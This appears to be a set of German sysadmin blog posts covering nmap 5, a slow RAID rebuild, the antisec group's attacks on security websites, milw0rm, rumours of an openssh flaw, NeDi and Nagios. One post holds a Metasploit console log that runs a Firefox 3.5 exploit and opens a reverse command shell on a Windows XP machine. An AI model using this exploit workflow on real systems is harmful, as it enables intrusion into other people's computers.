nmap 5 ist raus. Hier gibt es die wichtigsten Änderungen:

nmap 5 changes

ist wohl das lahmarschigste was ich je gesehen habe. Nach 2,5 Stunden (500GB):

C:UsersAdministratorDesktop>hrconf.exe getstatus 1
Controllers found: 1
Logical drive Task:
Logical drive : 1
Current operation : Rebuild
Status : In Progress
Percentage complete : 1


[update]

ohne Worte (nach 24 Stunden)

C:UsersAdministratorDesktop>hrconf.exe getstatus 1
Controllers found: 1
Logical drive Task:
Logical drive : 1
Current operation : Rebuild
Status : In Progress
Percentage complete : 31


Die antisec Gruppe, welche für die Hacks der Server von astalavista.com, infosec.org.uk, ssanz.net, sowie den imageshack Hack vom Wochenende verantwortlich ist, kündigt auf der full-disclosure Mailing Liste an, die Server von hackforums.net und milw0rm.com zu hacken.

Allerdings schein gerade ein denial of service Angriff gegen den Server von hackforums.net statt zufinden und so bittet die anti-sec Gruppe, den unbekannten Urheber des Angriffes doch den Angriff einzustellen, damit man endlich den Server hacken kann. (LOL)

Die Gruppe verfügt angeblich über einen apache 0day exploit, welche alle apache Versionen betreffen soll. Was soll man davon halten. Man wird sehen.

Gestern wurde bei milw0rm ein 0day Exploit für die aktuelle Version von Firefox 3.5 veröffentlicht.

msf exploit(firefox_escape_retval) > exploit
[*] Exploit running as background job.
msf exploit(firefox_escape_retval) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://192.168.1.102:80/test2
[*] Server started.
[*] Sending Firefox 3.5 escape() Return Value Memory Corruption to 192.168.1.101:2950...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (192.168.1.102:4444 -> 192.168.1.101:2951)
msf exploit(firefox_escape_retval) > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:ProgrammeMozilla Firefox>

nachdem Heise und andere milw0rm für tot erklärt haben macht die Seite heute einen recht lebhaften Eindruck. Tot gesagte leben länger!

[und doch wieder down]

[und wieder zu erreichen ... was bloß da los?]

Die Gerüchteküche brodelt heftig. Nach dem in der Mailing-Liste full-disclosure drei (bis auf die verwendeten Exploits) gut dokumentierte Einbrüche auf die Server von astalavista.com, ssanz.net und infosec.org.uk veröffentlicht würden, spekuliert man über eine Sicherheitslücke in openssh. Betroffen soll die in Centos/Red Hat Enterprise Linux eingesetzte Version 4.3 sein.

Die Einbrüche in die Server wurden von der antisec Gruppe verübt und richten sich gegen die Server von vermeitlichen Sicherheitsexperten.

Weitere Informationen hier:

astalavista.com hack
infosec.org.uk hack
ssanz.net hack

Nedi ist eine Anwendung zum Monitoring von (Cisco) Netzwerk-Equipment. Die Erkennung erfolgt via LLDP,CDP oder FDP.
Zum sammeln von Information einzelner Geräte wird snmp verwendet. Ein weiteres Feature ist die Backup-Funktion, welche
es ermöglicht Konfigurationen (running-config) zu speichern und zu vergleichen.

Die Installation ist sehr simpel, gute Anleitungen finden sich hier.

Eine Übersicht, was mit nedi alles möglich ist zeigt dieses Video:

Egal was man von dem Nagios-Fork durch Netways [und Teile der Nagios Community] halten mag, jedenfalls scheint sich auch in Sachen Nagios wieder mehr zu tun.

Seit gestern steht die Nagios Version 3.1.1 zum Download bereit. Da ich momentan noch keine Vorteile von Icinga für unser Setup hier erkennen kann, bleiben wir wohl erst einmal beim “Original”. Allerdings haben wir auch schon ein Icinga Setup in einer Virtuellen Machine laufen.

[Nagios 3.1.2 erschienen]

Dieser Bericht hat mich am Wochenende sehr amüsiert

[Full-disclosure] Astalavista.com Exposed